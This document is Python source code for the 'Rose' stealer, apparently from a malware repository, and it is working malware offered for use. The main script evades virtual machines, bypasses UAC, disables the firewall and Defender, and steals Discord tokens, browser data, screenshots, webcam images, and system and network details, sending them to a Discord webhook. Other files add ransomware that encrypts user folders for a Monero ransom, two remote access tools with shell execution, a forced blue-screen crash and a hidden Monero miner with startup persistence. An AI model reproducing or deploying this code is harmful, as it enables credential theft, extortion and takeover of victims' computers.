await ctx.send(f'Process {clientid} **is not** admin.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='getadmin')
async def getadmin(ctx, inputid):
if inputid == clientid:
ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1)
await ctx.send(f'Requested admin access for process {clientid}.')
sys.exit(0)
if inputid != clientid:
if inputid == 'all':
ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1)
await ctx.send(f'Requested admin access for process {clientid}.')
sys.exit(0)
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='quit')
async def quit(ctx, inputid):
if inputid == clientid:
await ctx.send(f'Terminated Knight Remote Adminstration Tool for {clientid}.')
sys.exit(0)
if inputid != clientid:
if inputid == 'all':
await ctx.send(f'Terminated Knight Remote Adminstration Tool for {clientid}.')
sys.exit(0)
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='clients')
async def clients(ctx):
await ctx.send(f'{hostname} - {clientid}.')
@bot.command(name='browser')
async def browser(ctx, inputid, url):
if inputid == clientid:
webbrowser.open(url)
await ctx.send(f'Opened webbrowser `{url}` for process {clientid}.')
if inputid != clientid:
if inputid == 'all':
webbrowser.open(url)
await ctx.send(f'Opened webbrowser `{url}` for process {clientid}.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
def run_rat():
bot.run(btoken)

376
Rose-Stealerv1/resources/source/old/main.py Normal file
View File

@@ -0,0 +1,376 @@
import os
import re
import ctypes
import pygame.camera
import subprocess
import threading
import sys
import platform
import shutil
from datetime import datetime
from dhooks import File, Embed
from base64 import b64decode
from Crypto.Cipher import AES
from ctypes import POINTER, Structure, byref, c_buffer, c_char, cdll, windll, wintypes
from json import loads as json_loads
from PIL import ImageGrab
from bin import xmr_miner, InjectX, rose_rat, knight_rat, block_sites, discordc, _roblox, tbsod, antivm, ransomware
from bin import _startup as startup
from bin.games import get_games
from bin.config import Config
from bin.webhook import _WebhookX
from bin._random_string import *
from bin.sysinf import send_device_information
from bin.uac_bypass import GetSelf, IsAdmin, UACbypass
from bin.browser import Browsers
from bin.ipinf import Info
cc = Config()
if platform.system() != "Windows":
sys.exit()
main_path = os.path.join(os.getenv("APPDATA"), "roseontop")
webhook = cc.get_webhook()
debug_mode = cc.get_debug_mode()
wh_avatar = cc.get_avatar()
wh_name = cc.get_name()
eb_color = cc.get_color()
eb_footer = cc.get_footer()
Threadlist = []
local = os.getenv("LOCALAPPDATA")
roaming = os.getenv("APPDATA")
temp = os.getenv("TEMP")
username = os.getlogin()
class DATA_BLOB(Structure):
_fields_ = [("cbData", wintypes.DWORD), ("pbData", POINTER(c_char))]
def GetData(blob_out):
cbData = int(blob_out.cbData)
pbData = blob_out.pbData
buffer = c_buffer(cbData)
cdll.msvcrt.memcpy(buffer, pbData, cbData)
windll.kernel32.LocalFree(pbData)
return buffer.raw
def send_error_notification(exception, type):
webx = _WebhookX().get_object()
embed = Embed(title="Rose Report", description="Rose Instance - Error", color=eb_color, timestamp=datetime.now().isoformat())
embed.set_author(name=wh_name, icon_url=wh_avatar)
embed.set_footer(text=eb_footer, icon_url=wh_avatar)
embed.add_field(name=f"Error in {type} occured | Help us by reporting this bug", value=f"`{exception}`", inline=False)
webx.send(embed=embed)
if cc.get_antivm():
try:
if antivm.user_check():
os._exit(1)
if antivm.hwid_check():
os._exit(1)
if antivm.ip_check():
os._exit(1)
if antivm.registry_check():
os._exit(1)
if antivm.dll_check():
os._exit(1)
if antivm.specs_check():
os._exit(1)
if antivm.proc_check():
os._exit(1)
if antivm.mac_check():
os._exit(1)
antivm.process_check()
except Exception as e:
send_error_notification(e, "Rose Anti-VM")
if cc.get_uac_bypass():
try:
if not IsAdmin():
if GetSelf()[1]:
if UACbypass():
os._exit(1)
else:
param = " ".join(sys.argv)
if ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, param, None, 1) > 32:
os._exit(0)
except Exception as e:
send_error_notification(e, "Rose UAC Bypass")
if IsAdmin():
if cc.get_disable_protectors():
subprocess.run("netsh advfirewall set domainprofile state off", shell=True)
subprocess.run('Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableRealtimeMonitoring" -Value 1', shell=True)
if cc.get_block_sites():
block_sites.block_sites()
if cc.get_start_up():
try:
startup.Startup()
except Exception as e:
send_error_notification(e, "Rose Startup")
if not os.path.exists(main_path):
try:
os.mkdir(main_path)
except Exception as e:
pass
if cc.get_fake_error():
try:
ctypes.windll.user32.MessageBoxW(0, "This application failed to start because d3dx9_43.dll was not found. Re-installing the application may fix this problem.", f"{os.path.basename(__file__)} - System Error", 16)
except Exception as e:
send_error_notification(e, "Rose Fake Error")
if cc.get_discord_ping():
try:
webx = _WebhookX().get_object()
webx.send("@everyone")
except Exception as e:
send_error_notification(e, "Rose Ping")
def DecryptValue(buff, master_key=None):
starts = buff.decode(encoding="utf8", errors="ignore")[:3]
if starts in ("v10", "v11"):
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
def CryptUnprotectData(encrypted_bytes, entropy=b""):
buffer_in = c_buffer(encrypted_bytes, len(encrypted_bytes))
buffer_entropy = c_buffer(entropy, len(entropy))
blob_in = DATA_BLOB(len(encrypted_bytes), buffer_in)
blob_entropy = DATA_BLOB(len(entropy), buffer_entropy)
blob_out = DATA_BLOB()
if windll.crypt32.CryptUnprotectData(byref(blob_in), None, byref(blob_entropy), None, None, 0x01, byref(blob_out)):
return GetData(blob_out)
# credits to lotus
Tokens = ""
dclass = discordc.DiscordX()
def GetDiscord(path, arg):
if not os.path.exists(f"{path}/Local State"):
return
pathC = path + arg
pathKey = path + "/Local State"
with open(pathKey, "r", encoding="utf-8") as f:
local_state = json_loads(f.read())
master_key = b64decode(local_state["os_crypt"]["encrypted_key"])
master_key = CryptUnprotectData(master_key[5:])
# print(path, master_key)
for file in os.listdir(pathC):
# print(path, file)
if file.endswith(".log") or file.endswith(".ldb"):
for line in [x.strip() for x in open(f"{pathC}\\{file}", errors="ignore").readlines() if x.strip()]:
for token in re.findall(r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*", line):
global Tokens
tokenDecoded = DecryptValue(b64decode(token.split("dQw4w9WgXcQ:")[1]), master_key)
if dclass.checkToken(tokenDecoded) and tokenDecoded not in Tokens:
# print(token)
Tokens += tokenDecoded
# writeforfile(Tokens, 'tokens')
dclass.uploadToken(tokenDecoded)
def GetTokens(path, arg):
if not os.path.exists(path):
return
path += arg
for file in os.listdir(path):
if file.endswith(".log") or file.endswith(".ldb"):
for line in [x.strip() for x in open(f"{path}\\{file}", errors="ignore").readlines() if x.strip()]:
for regex in (
r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}",
r"mfa\.[\w-]{80,95}",
):
for token in re.findall(regex, line):
global Tokens
if dclass.checkToken(token) and token not in Tokens:
Tokens += token
dclass.uploadToken(token)
discordPaths = [
[f"{roaming}/Discord", "/Local Storage/leveldb"],
[f"{roaming}/Lightcord", "/Local Storage/leveldb"],
[f"{roaming}/discordcanary", "/Local Storage/leveldb"],
[f"{roaming}/discordptb", "/Local Storage/leveldb"],
]
if cc.get_token_stealing():
for patt in discordPaths:
a = threading.Thread(target=GetDiscord, args=[patt[0], patt[1]])
a.start()
Threadlist.append(a)
if cc.get_browser_stealing():
try:
browsers = Browsers(webhook)
except Exception as e:
send_error_notification(e, "Rose Browser Stealer")
if cc.get_screenshot():
try:
rndm_strr = get_random_string(5)
path = os.path.join(main_path, f"screenshot_{rndm_strr}.png")
screenshot = ImageGrab.grab()
screenshot.save(path)
webx = _WebhookX().get_object()
embed = Embed(title="Rose Report", description="Rose Instance - Screenshot", color=eb_color, timestamp=datetime.now().isoformat())
embed.set_author(name=wh_name, icon_url=wh_avatar)
embed.set_footer(text=eb_footer, icon_url=wh_avatar)
file = File(path, name="screenshot.png")
embed.set_image(url=f"attachment://screenshot.png")
webx.send(embed=embed, file=file)
os.remove(path)
except Exception as e:
send_error_notification(e, "Rose Screenshot Stealer")
if cc.get_webcam():
pygame.camera.init()
camlist = pygame.camera.list_cameras()
try:
rndm_strr = get_random_string(5)
if camlist:
cam = pygame.camera.Camera(camlist[0], (640, 480))
cam.start()
image = cam.get_image()
path = os.path.join(main_path, f"webcam_{rndm_strr}.png")
pygame.image.save(image, path)
cam.stop()
webx = _WebhookX().get_object()
embed = Embed(title="Rose Report", description="Rose Instance - Webcam", color=eb_color, timestamp=datetime.now().isoformat())
embed.set_author(name=wh_name, icon_url=wh_avatar)
embed.set_footer(text=eb_footer, icon_url=wh_avatar)
file = File(path, name="webcam.png")
embed.set_image(url=f"attachment://webcam.png")
webx.send(embed=embed, file=file)
os.remove(path)
except Exception as e:
send_error_notification(e, "Rose Webcam Stealer")
if cc.get_games():
try:
get_games().get_games()
except Exception as e:
send_error_notification(e, "Rose Games and Application Grabber")
if cc.get_deviceinf_stealing():
try:
send_device_information()
except Exception as e:
send_error_notification(e, "Rose Device Data Stealing")
if cc.get_ipinf_stealing():
try:
Info().send_data()
except Exception as e:
send_error_notification(e, "Rose IP & Wi-Fi Data")
if cc.get_injection():
try:
InjectX.InjectionX(webhook)
except Exception as e:
send_error_notification(e, "Rose Discord Injection")
if cc.get_roblox_stealing():
try:
_roblox.RobloxX().run()
except Exception as e:
send_error_notification(e, "Rose Roblox Stealer")
if os.path.exists(main_path):
try:
shutil.rmtree(main_path)
except Exception as e:
pass
if cc.get_xmr_miner():
try:
threading.Thread(target=xmr_miner.xmrig()).start()
except Exception as e:
send_error_notification(e, "XMR Miner")
if cc.get_ransomware():
try:
threading.Thread(target=ransomware.ransomware()).start()
except Exception as e:
send_error_notification(e, "Rose Ransomware")
if cc.get_knight_discord_rat():
try:
threading.Thread(target=knight_rat.run_rat()).start()
except Exception as e:
send_error_notification(e, "Knight Remote Access")
if cc.get_rose_discord_rat():
try:
threading.Thread(target=rose_rat.run_rat()).start()
except Exception as e:
send_error_notification(e, "Rose Remote Access")
if cc.get_bbcrash():
try:
cr_file = os.path.join(os.getenv("appdata"), "rose", "csh45r.bat")
with open(cr_file, "w") as f:
f.write("%0|%0")
subprocess.run("start /min cmd /k call {}".format(cr_file), shell=True, startupinfo=subprocess.STARTUPINFO(dwFlags=subprocess.STARTF_USESHOWWINDOW))
except Exception as e:
send_error_notification(e, "Rose Batch Crash Attempter")
if cc.get_tsbsod():
try:
tbsod.Trigger()
except Exception as e:
send_error_notification(e, "Rose Trigger BSOD")
if cc.get_rose_melt_stub():
try:
if not (cc.get_knight_discord_rat() or cc.get_rose_discord_rat() or cc.get_ransomware()):
path = sys.argv[0]
subprocess.Popen('ping localhost -n 3 > NUL && del /A H /F "{}"'.format(path), shell=True, creationflags=subprocess.CREATE_NEW_CONSOLE | subprocess.SW_HIDE)
sys.exit()
except Exception as e:
send_error_notification(e, "Rose Anti Debug")

136
Rose-Stealerv1/resources/source/old/ransomware.py Normal file
View File

@@ -0,0 +1,136 @@
import os
import random
import string
import requests
import datetime
import errno
from cryptography.fernet import Fernet
from bin.config import Config
cc = Config()
target_directory = r"C:/Users" # Directory to encrypt
webhook_url = cc.get_ransomware_discord_webhook_url() # Discord Webhook URL
email_adr = cc.get_ransomware_email_adress() # Email Adress where your encryption key will be sent
monero_adr = cc.get_ransomware_monero_wallet_adress() # Monero Wallet Address
cash = cc.get_ransomware_amount_of_money() # Amount of money to receive
timestamp = datetime.datetime.now().isoformat()
def log_error(e):
data = {"username": "Rose Ransomware", "avatar_url": "https://raw.githubusercontent.com/DamagingRose/Rose-Grabber/main/resources/assets/Rose.png", "embeds": [{"title": "Rose Ransomware Error", "url": "https://github.com/voyqge", "color": cc.get_color(), "fields": [{"name": "USER ID", "value": f"`{user_id}`", "inline": True}, {"name": "ERROR OCCURED", "value": f"`{e}`", "inline": True}], "footer": {"text": "https://github.com/voyqge"}, "timestamp": timestamp}]}
try:
requests.post(webhook_url, json=data)
except Exception:
pass
characters = string.ascii_letters + string.digits
user_id = "".join(random.choice(characters) for i in range(9)) # Creates random user ID
key = Fernet.generate_key() # Creates random AES key
cipher_suite = Fernet(key)
encryptedfiles = [] # Saves all encrypted files
ransom_note = f"""Your computer is now infected with ransomware. Your file are encrypted with a secure algorithm that is impossible to crack.
To recover your files you need a key. This key is generated once your file have been encrypted. To obtain the key, you must purchase it.
You can do this by sending {cash} USD to this monero address:
{monero_adr}
Don't know how to get monero? Here are some websites:
https://www.coinbase.com/how-to-buy/monero
https://localmonero.co/?language=en
https://www.okx.com/buy-xmr
Once you have sent the ransom to the monero address you must write an email this this email address: {email_adr}
In this email you will include your personal ID so we know who you are. Your personal ID is: {user_id}
Once you have completeted all of the steps, you will be provided with the key to decrypt your files.
Don't know how ransomware works? Read up here:
https://www.trellix.com/en-us/security-awareness/ransomware/what-is-ransomware.html
https://www.checkpoint.com/cyber-hub/threat-prevention/ransomware/
https://www.trendmicro.com/vinfo/us/security/definition/Ransomware
Note: Messing with the ransomware will simply make your files harder to decrypt. Deleting the webhook will make it impossible, as the key can not be generated.
Good luck"""
def send_wh():
data = {"username": "Rose Ransomware", "avatar_url": "https://raw.githubusercontent.com/DamagingRose/Rose-Grabber/main/resources/assets/Rose.png", "embeds": [{"title": "Rose Ransomware Hit", "description": "Hello. It looks like you have hit another person. As soon as they send you an email with their personal ID and you approved their payment, please send them the download link for the decryption tool and give them their key, thanks. https://github.com/DamagingRose/Rose-Grabber/tree/main/resources/utils/rosedec", "url": "https://github.com/voyqge", "color": cc.get_color(), "fields": [{"name": "USER ID", "value": f"`{user_id}`", "inline": True}, {"name": "TARGET DIR", "value": f"`{target_directory}`", "inline": True}, {"name": "DECRYPTION KEY", "value": f"`{key.hex()}`", "inline": True}], "footer": {"text": "https://github.com/voyqge"}, "timestamp": timestamp}]}
try:
requests.post(webhook_url, json=data)
except Exception:
pass
def encrypt_file(file_path):
encryptedfiles.append(file_path)
with open(file_path, "rb") as file:
file_data = file.read()
encrypted_data = cipher_suite.encrypt(file_data)
encrypted_file_path = file_path + ".rose.encrypted"
with open(encrypted_file_path, "wb") as encrypted_file:
encrypted_file.write(encrypted_data)
os.remove(file_path)
def encrypt_directory(directory_path):
for root, dirs, files in os.walk(directory_path):
for file in files:
file_path = os.path.join(root, file)
try:
encrypt_file(file_path)
except OSError as e:
if e.errno in (errno.EACCES, errno.EPERM, errno.EINVAL, errno.ENOENT, errno.ENOTDIR, errno.ENAMETOOLONG, errno.EROFS):
pass # Ignore permission/access errors
except Exception as e:
if isinstance(
e,
(
FileNotFoundError,
IsADirectoryError,
TimeoutError,
),
):
pass # Ignore common file errors
else:
log_error(e)
def encrypted_files():
try:
with open("ROSE-RANSOMWARE-ENCRYPTED-FILES.txt", "w") as file:
for encryptedfile in encryptedfiles:
file.write(encryptedfile + "\n")
except Exception as e:
log_error(e)
def ransomware():
send_wh()
encrypt_directory(target_directory)
encrypted_files()
try:
desktop = os.path.join(os.path.join(os.environ["USERPROFILE"]), "Desktop")
file_path = os.path.join(desktop, "ROSE-RANSOMWARE-NOTE.txt")
with open(file_path, "w") as f:
f.write(ransom_note)
os.startfile(file_path)
except Exception as e:
log_error(e)

227
Rose-Stealerv1/resources/source/old/rose_rat.py Normal file
View File

@@ -0,0 +1,227 @@
from bin.config import Config
from bin.webhook import _WebhookX
from bin.ipinf import Info
cc = Config()
ii = Info()
import socketio
import cv2
import random
import pyttsx3
import string
import ctypes
import os
from datetime import datetime
import subprocess
import io
from dhooks import Embed, File
from PIL import ImageGrab
from pynput.keyboard import Key, Controller
import threading
sio = socketio.Client()
class CommandHandler:
def __init__(self):
self.webhook = _WebhookX().get_object()
self.keyboard = Controller()
def screenshot(self):
screenshot = ImageGrab.grab()
file_name = "".join(random.choice(string.ascii_letters) for i in range(10))
screenshot.save(f"temp_{file_name}.png")
file = File(f"temp_{file_name}.png", name="Rose-Injector Screenshot.png")
self.webhook.send(file=file)
os.remove(f"temp_{file_name}.png")
@staticmethod
def messagebox(message):
MB_YESNO = 0x04
MB_HELP = 0x4000
ICON_STOP = 0x10
ctypes.windll.user32.MessageBoxW(0, message, "Error", MB_HELP | MB_YESNO | ICON_STOP)
def shell(self, instruction):
def _shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE, shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
try:
result = str(_shell().stdout.decode("CP437")) # CP437 Decoding used for characters like " é " etc..
except Exception as e:
result = str(f"Error | Advanced log: {e}")
embed = Embed(description="Rose RAT", color=11495919, timestamp="now") # sets the timestamp to current time
embed.set_author(name=f"Shell command result | {instruction}", icon_url=cc.get_avatar())
embed.set_footer(text=cc.get_footer(), icon_url=cc.get_avatar())
embed.add_field(name="Result", value=f"`{result}`")
self.webhook.send(embed=embed)
def shutdown(self):
embed = Embed(description="Rose RAT", color=11495919, timestamp="now") # sets the timestamp to current time
embed.set_author(name=f"Shutting down the PC", icon_url=cc.get_avatar())
embed.set_footer(text=cc.get_footer(), icon_url=cc.get_avatar())
self.webhook.send(embed=embed)
os.system("shutdown /s /t 1")
def webcampic(self): # Take a picture with the webcam and send it with the webhook
try:
cam = cv2.VideoCapture(0) # 0 -> index of camera
s, img = cam.read()
if s: # frame captured without any errors
suc, buffer = cv2.imencode(".jpg", img)
io_buf = io.BytesIO(buffer)
file = File(io_buf, name="cam.jpg")
self.webhook.send(file=file)
except Exception as e:
embed = Embed(description="Rose RAT", color=16399677, timestamp="now") # sets the timestamp to current time
embed.set_author(name=f"WebcamPIC Error", icon_url=cc.get_avatar())
embed.set_footer(text=cc.get_footer(), icon_url=cc.get_avatar())
embed.add_field(name="Advanced log:", value=f"`{e}`")
self.webhook.send(embed=embed)
def volumeup(self):
for i in range(50):
self.keyboard.press(Key.media_volume_up)
self.keyboard.release(Key.media_volume_up)
def volumedown(self):
for i in range(50):
self.keyboard.press(Key.media_volume_down)
self.keyboard.release(Key.media_volume_down)
def voice(self, text):
self.volumeup()
engine = pyttsx3.init()
engine.setProperty("rate", 150)
engine.say(text)
engine.runAndWait()
def uptime(self):
embed = Embed(description="Rose RAT", color=11495919, timestamp="now") # sets the timestamp to current time
embed.set_author(name=f"Connection Uptime", icon_url=cc.get_avatar())
embed.add_field(name="Uptime :", value=datetime.now())
embed.set_footer(text=cc.get_footer(), icon_url=cc.get_avatar())
self.webhook.send(embed=embed)
def screenshare(self):
def to_execute(self):
import socketio
from zlib import compress
import time
from mss import mss
_sio = socketio.Client()
WIDTH = 1900
HEIGHT = 1000
@_sio.event
def connect():
while True:
with mss() as sct:
# The region to capture
rect = {"top": 0, "left": 0, "width": WIDTH, "height": HEIGHT}
while True:
# Capture the screen
img = sct.grab(rect)
# Tweak the compression level here (0-9)
pixels = compress(img.rgb, 6)
# Send the size of the pixels length
size = len(pixels)
size_len = (size.bit_length() + 7) // 8
final_size_len = bytes([size_len])
# conn.send(bytes([size_len]))
# Send the actual pixels length
size_bytes = size.to_bytes(size_len, "big")
final_size_bytes = size_bytes
# conn.send(size_bytes)
# Send pixels
# conn.sendall(pixels)
_sio.emit("sending_screenshot", {"data": {"size_len": final_size_len, "size_bytes": final_size_bytes, "pixels": pixels}})
time.sleep(0.5) # Don't overload the server
_sio.connect(cc.get_rose_discord_rat_link())
t = threading.Thread(target=to_execute, args=(self,))
t.run()
cmdhandler = CommandHandler()
@sio.event
def connect():
start_time = datetime.now()
sio.emit(
"rose_connect",
{
"data": {
"ip": ii.get_ip(),
"username": ii.get_username(),
"server": cc.get_rose_discord_rat_link(),
"webhook": cc.get_webhook(),
"avatar": cc.get_avatar(),
"footer": cc.get_footer(),
}
},
)
@sio.event
def receive_command(data):
if data["data"] == "screenshot":
cmdhandler.screenshot()
if data["data"].startswith("messagebox") is True:
cmdhandler.messagebox(data["data"].split("messagebox", 1)[1])
if data["data"].startswith("shell") is True:
cmdhandler.shell(data["data"].split("shell", 1)[1])
if data["data"].startswith("voice") is True:
cmdhandler.voice(data["data"].split("voice", 1)[1])
if data["data"] == "screenshare":
cmdhandler.screenshare()
if data["data"] == "volumemax":
cmdhandler.volumeup()
if data["data"] == "volumezero":
cmdhandler.volumedown()
if data["data"] == "shutdown":
cmdhandler.shutdown()
if data["data"] == "webcampic":
cmdhandler.webcampic()
if data["data"] == "uptime":
cmdhandler.uptime()
@sio.event
def disconnect():
print("disconnect")
def run_rat():
sio.connect(cc.get_rose_discord_rat_link())
sio.wait()

215
Rose-Stealerv1/resources/source/old/sysinf.py Normal file
View File

@@ -0,0 +1,215 @@
import os
import wmi
import subprocess
import GPUtil
import sys
import psutil
import pywifi
import uuid
import pyautogui
import pygame.camera
import socket
import platform
import requests
from bin.config import Config
from datetime import datetime
cc = Config()
webhook = cc.get_webhook()
eb_color = cc.get_color()
def get_drive_info():
drive_info = []
partitions = psutil.disk_partitions()
for partition in partitions:
drive = {}
drive["device"] = partition.device
drive["mountpoint"] = partition.mountpoint
try:
usage = psutil.disk_usage(partition.mountpoint)
drive["total"] = usage.total
drive["used"] = usage.used
drive_info.append(drive)
except OSError as e:
continue
return drive_info
def format_drive_info(drives):
formatted_info = []
for drive in drives:
formatted = f"Drive: {drive['device']} (Mountpoint: {drive['mountpoint']}) - " f"Total Space: {drive['total']} bytes - " f"Used Space: {drive['used']} bytes"
formatted_info.append(formatted)
return " - ".join(formatted_info)
pygame.camera.init()
username = str(os.getenv("USERNAME"))
hostname = str(os.environ["COMPUTERNAME"])
hwid = subprocess.check_output("wmic csproduct get uuid").split(b"\n")[1].strip().decode("utf-8", errors="ignore")
wifi_interfaces = pywifi.PyWiFi().interfaces()
iface = wifi_interfaces[0] if wifi_interfaces else None
ssid, bssid = "No result", "No result"
if iface:
iface.scan()
for result in iface.scan_results():
try:
ssid = result.ssid
bssid = result.bssid
except:
pass
# For some reason this may result in an error (https://github.com/DamagingRose/Rose-Grabber/issues/167)
# pywifi/profile.py already initializes an SSID variable, so why this happens in unknown.
lang = subprocess.check_output("wmic os get MUILanguages /format:list").decode().strip().split("\r\r\n")[0].split("=")[1] if subprocess.check_output("wmic os get MUILanguages /format:list", shell=True).decode().strip() else "No Language"
try:
system_output = subprocess.check_output("wmic os get Caption /format:list", shell=True).decode().strip()
except:
system_output = None
system = str(system_output.split("\r\r\n")[0].split("=")[1]) if system_output else "No System Information"
output = subprocess.check_output("wmic path softwarelicensingservice get OA3xOriginalProductKey", shell=True).decode().strip()
product_key = str(output.split("\n", 1)[-1].strip()) if output else "No Product Key"
ram = str(round(psutil.virtual_memory().total / (1024.0**3))) + " GB"
power = str(psutil.sensors_battery().percent) + "%" if psutil.sensors_battery() is not None else "No battery"
screen = f"{pyautogui.size()[0]}x{pyautogui.size()[1]}"
webcams_count = len(pygame.camera.list_cameras())
internal_ip = str(socket.gethostbyname(socket.gethostname()))
external_ip = str(requests.get("https://api.ipify.org").text)
gpus = GPUtil.getGPUs()
gpu_info = str("")
for gpu in gpus:
gpu_info += f"GPU Name: {gpu.name} - GPU Driver: {gpu.driver} - GPU Memory Total: {gpu.memoryTotal}MB - GPU Memory Free: {gpu.memoryFree}MB - GPU Memory Used: {gpu.memoryUsed}MB"
info = wmi.WMI().Win32_Processor()[0]
cpu_info = str(f"Name: {info.Name} - Arch: x{info.AddressWidth} - Cores: {info.NumberOfCores}")
current_execution_path = str(os.path.join(os.getcwd(), sys.argv[0]))
drives = get_drive_info()
drive_info_string = str(format_drive_info(drives))
mac_address = str(":".join(["{:02X}".format((uuid.getnode() >> elements) & 0xFF) for elements in range(0, 2 * 6, 2)][::-1]))
processor_id = str(platform.processor())
device_model = (lambda output: output.split("\n")[1].strip() if output else "No Device Model")(str(subprocess.check_output("wmic csproduct get name"), "utf-8"))
current_time_iso = datetime.now().isoformat()
def send_device_information():
embed = {
"title": "Rose Report",
"description": "Rose Instance - System Information",
"color": eb_color,
"fields": [
{
"name": "Hostname",
"value": f"`{hostname}`",
"inline": False,
},
{
"name": "Username",
"value": f"`{username}`",
"inline": False,
},
{
"name": "Device Model",
"value": f"`{device_model}`",
"inline": False,
},
{
"name": "HWID",
"value": f"`{hwid}`",
"inline": False,
},
{
"name": "SSID",
"value": f"`{ssid}`",
"inline": False,
},
{
"name": "BSSID",
"value": f"`{bssid}`",
"inline": False,
},
{
"name": "Language",
"value": f"`{lang}`",
"inline": False,
},
{
"name": "System",
"value": f"`{system}`",
"inline": False,
},
{
"name": "Product Key",
"value": f"`{product_key}`",
"inline": False,
},
{
"name": "RAM",
"value": f"`{ram}`",
"inline": False,
},
{
"name": "Power",
"value": f"`{power}`",
"inline": False,
},
{
"name": "Screen",
"value": f"`{screen}`",
"inline": False,
},
{
"name": "Webcams",
"value": f"`{webcams_count}`",
"inline": False,
},
{
"name": "Internal IP",
"value": f"`{internal_ip}`",
"inline": False,
},
{
"name": "External IP",
"value": f"`{external_ip}`",
"inline": False,
},
{
"name": "GPU",
"value": f"`{gpu_info}`",
"inline": False,
},
{
"name": "CPU",
"value": f"`{cpu_info}`",
"inline": False,
},
{
"name": "Current Execution Path",
"value": f"`{current_execution_path}`",
"inline": False,
},
{
"name": "Drives",
"value": f"`{drive_info_string}`",
"inline": False,
},
{
"name": "MAC Address",
"value": f"`{mac_address}`",
"inline": False,
},
{
"name": "Processor ID",
"value": f"`{processor_id}`",
"inline": False,
},
],
"footer": {"text": cc.get_footer(), "icon_url": cc.get_avatar()},
"author": {"name": cc.get_name(), "icon_url": cc.get_avatar()},
"timestamp": current_time_iso,
}
requests.post(webhook, json={"embeds": [embed]})

14
Rose-Stealerv1/resources/source/old/tbsod.py Normal file
View File

@@ -0,0 +1,14 @@
from ctypes import windll
from ctypes import c_int
from ctypes import c_uint
from ctypes import c_ulong
from ctypes import POINTER
from ctypes import byref
def Trigger():
nullptr = POINTER(c_int)()
windll.ntdll.RtlAdjustPrivilege(c_uint(19), c_uint(1), c_uint(0), byref(c_int()))
windll.ntdll.NtRaiseHardError(c_ulong(0xC000007B), c_ulong(0), nullptr, nullptr, c_uint(6), byref(c_uint()))

40
Rose-Stealerv1/resources/source/old/uac_bypass.py Normal file
View File

@@ -0,0 +1,40 @@
import subprocess
import ctypes
import sys
def UACbypass(method: int = 1) -> bool:
if GetSelf()[1]:
execute = lambda cmd: subprocess.run(cmd, shell=True, capture_output=True)
if method == 1:
execute(f'reg add hkcu\Software\\Classes\\ms-settings\\shell\\open\\command /d "{sys.executable}" /f')
execute('reg add hkcu\Software\\Classes\\ms-settings\\shell\\open\\command /v "DelegateExecute" /f')
log_count_before = len(execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').stdout.decode("utf-8"))
execute("computerdefaults --nouacbypass")
log_count_after = len(execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').stdout.decode("utf-8"))
execute("reg delete hkcu\Software\\Classes\\ms-settings /f")
if log_count_after > log_count_before:
return UACbypass(method + 1)
elif method == 2:
execute(f'reg add hkcu\Software\\Classes\\ms-settings\\shell\\open\\command /d "{sys.executable}" /f')
execute('reg add hkcu\Software\\Classes\\ms-settings\\shell\\open\\command /v "DelegateExecute" /f')
log_count_before = len(execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').stdout.decode("utf-8"))
execute("fodhelper --nouacbypass")
log_count_after = len(execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').stdout.decode("utf-8"))
execute("reg delete hkcu\Software\\Classes\\ms-settings /f")
if log_count_after > log_count_before:
return UACbypass(method + 1)
else:
return False
return True
def IsAdmin() -> bool:
return ctypes.windll.shell32.IsUserAnAdmin() == 1
def GetSelf() -> tuple[str, bool]:
if hasattr(sys, "frozen"):
return (sys.executable, True)
else:
return (__file__, False)

14
Rose-Stealerv1/resources/source/old/webhook.py Normal file
View File

@@ -0,0 +1,14 @@
from dhooks import Webhook
from bin.config import Config
import requests
cc = Config()
class _WebhookX:
def __init__(self):
self.webx = Webhook(cc.get_webhook())
self.webx.modify(name=cc.get_name(), avatar=requests.get(cc.get_avatar()).content)
def get_object(self):
return self.webx

61
Rose-Stealerv1/resources/source/old/xmr_miner.py Normal file
View File

@@ -0,0 +1,61 @@
import subprocess
import os
import sys
from bin.config import Config
from bin._random_string import get_random_string
cc = Config()
def xmrig():
batch_code = """
@echo off
set XMRIG_URL=https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip
REM Generating a random directory name for installation
set "INSTALL_DIR=%APPDATA%\\rose\\%RANDOM%\\%RANDOM%"
mkdir "%INSTALL_DIR%"
cd /d "%INSTALL_DIR%"
powershell -command "& {{Invoke-WebRequest '%XMRIG_URL%' -OutFile 'xmrig.zip'}}"
powershell -command "& {{Expand-Archive -Path '.\\xmrig.zip' -DestinationPath '.'}}"
cd xmrig-6.21.0
echo @echo off > start_xmrig.bat
echo cd /d "%INSTALL_DIR%\\xmrig-6.21.0" >> start_xmrig.bat
echo start xmrig.exe --donate-level 1 -o de.monero.herominers.com:1111 -u {} -p {} -a rx/0 -k --background >> start_xmrig.bat
echo move /y "start_xmrig.bat" "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" > move_to_startup.bat
call move_to_startup.bat
del move_to_startup.bat
cd %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\
call start_xmrig.bat %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\
exit
""".format(
cc.get_xmr_adress(), get_random_string(12)
)
